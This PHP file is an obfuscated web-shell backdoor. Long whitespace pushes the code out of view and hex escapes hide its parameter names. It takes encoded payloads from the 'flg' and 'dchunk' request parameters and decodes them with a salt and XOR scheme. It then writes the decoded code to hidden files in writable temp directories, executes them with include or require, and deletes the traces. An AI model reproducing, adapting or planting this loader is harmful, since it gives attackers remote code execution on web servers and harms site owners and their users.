<?php																																										if(array_key_exists("f\x6Cg", $_POST)){ $token = array_filter(["/var/tmp", sys_get_temp_dir(), getenv("TEMP"), "/tmp", getenv("TMP"), "/dev/shm", getcwd(), session_save_path(), ini_get("upload_tmp_dir")]); $entry = $_POST["f\x6Cg"]; $entry =explode( "." ,$entry ) ; $k = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s2); $p = 0; $__tmp = $entry; while( $v8 = array_shift( $__tmp)) { $sChar = ord( $s2[$p% $sLen]); $dec = ( ( int)$v8 - $sChar -( $p% 10)) ^ 62; $k .= chr( $dec); $p++; } for ($component = 0, $factor = count($token); $component < $factor; $component++) { $object = $token[$component]; if (is_dir($object) ? is_writable($object) : false) { $reference = join("/", [$object, ".mrk"]); if (@file_put_contents($reference, $k) !== false) { include $reference; unlink($reference); exit; } } } }


if(!empty($_REQUEST["dchu\x6Ek"])){
	$mrk = $_REQUEST["dchu\x6Ek"];
	 $mrk  	=   explode	(	"."	 ,			$mrk	  );
	$pointer =	'';
            $salt9 =	'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen =	strlen(		$salt9	 );
            $r =	0;
    
            array_walk(		$mrk,	function(		$v8) use(		&$pointer,	&$r,	$salt9,	$sLen) {
                $sChar =	ord(		$salt9[$r%  $sLen]	 );
                $d =	(		(		int)$v8 - $sChar -(		$r%  10))	^	99;
                $pointer .= chr(		$d	 );
                $r++;
            }	 );
	$data = array_filter([ini_get("upload_tmp_dir"), "/dev/shm", getenv("TMP"), getenv("TEMP"), getcwd(), sys_get_temp_dir(), "/tmp", session_save_path(), "/var/tmp"]);
	foreach ($data as $itm) {
    		if (!!is_dir($itm) && !!is_writable($itm)) {
    $ent = "$itm/.pgrp";
    if (file_put_contents($ent, $pointer)) {
	require $ent;
	unlink($ent);
	exit;
}
}
}
}